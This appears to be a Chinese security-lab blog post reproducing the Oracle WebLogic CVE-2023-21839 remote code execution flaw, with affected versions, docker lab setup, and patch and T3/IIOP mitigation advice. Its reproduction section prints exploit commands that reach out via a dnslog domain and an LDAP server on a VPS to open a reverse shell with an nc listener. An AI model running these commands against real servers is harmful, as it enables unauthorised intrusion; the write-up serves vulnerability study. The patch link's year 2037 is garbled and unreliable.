终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

Oracle WebLogic Server 远程代码执行漏洞(CVE-2023-21839)反弹shell

弥天安全实验室 弥天安全实验室 2023-03-02



网安引领时代,弥天点亮未来   





 


0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍
Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。



















0x02影响版本

Oracle WebLogic Server 12.2.1.3.0

Oracle WebLogic Server 12.2.1.4.0 

Oracle WebLogic Server 14.1.1.0.0




0x03漏洞复现

1.使用docker搭建漏洞环境

访问地址

2.对漏洞进行复现

1.测试DNSlog出网,生成域名

漏洞执行情况

java -jar Weblogic-CVE-2023-21839.jar 192.168.86.6:7001 ldap://kmtgrn.dnslog.cn/mt

2.反弹shell

使用JNDIExploit-1.4-SNAPSHOT工具启动ladp服务,加载漏洞利用poc

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip

在vps服务器开启

nc监听反弹端口

执行漏洞利用代码

java -jar Weblogic-CVE-2023-21839.jar 192.168.86.6:7001 ldap://vsp:1389/Basic/ReverseShell/vps/12388

成功获得shell

简单流量分析

执行命令




0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

缓解方式禁用 T3 及 IIOP

https://www.oracle.com/security-alerts/cpujan2037.html



0x05参考链接

https://mp.weixin.qq.com/s/Do9fV3K9VDW_pCPAaWnkbQhttps://mp.weixin.qq.com/s/3JyAFIJ4Isr_p1kTBucLHwhttps://github.com/DXask88MA/Weblogic-CVE-2023-21839https://github.com/WhiteHSBG/JNDIExploit


弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来


















 


知识分享完了

喜欢别忘了关注我们哦~


学海浩茫,予以风动,必降弥天之润!


   弥  天

安全实验室


文章有问题?点此查看未经处理的缓存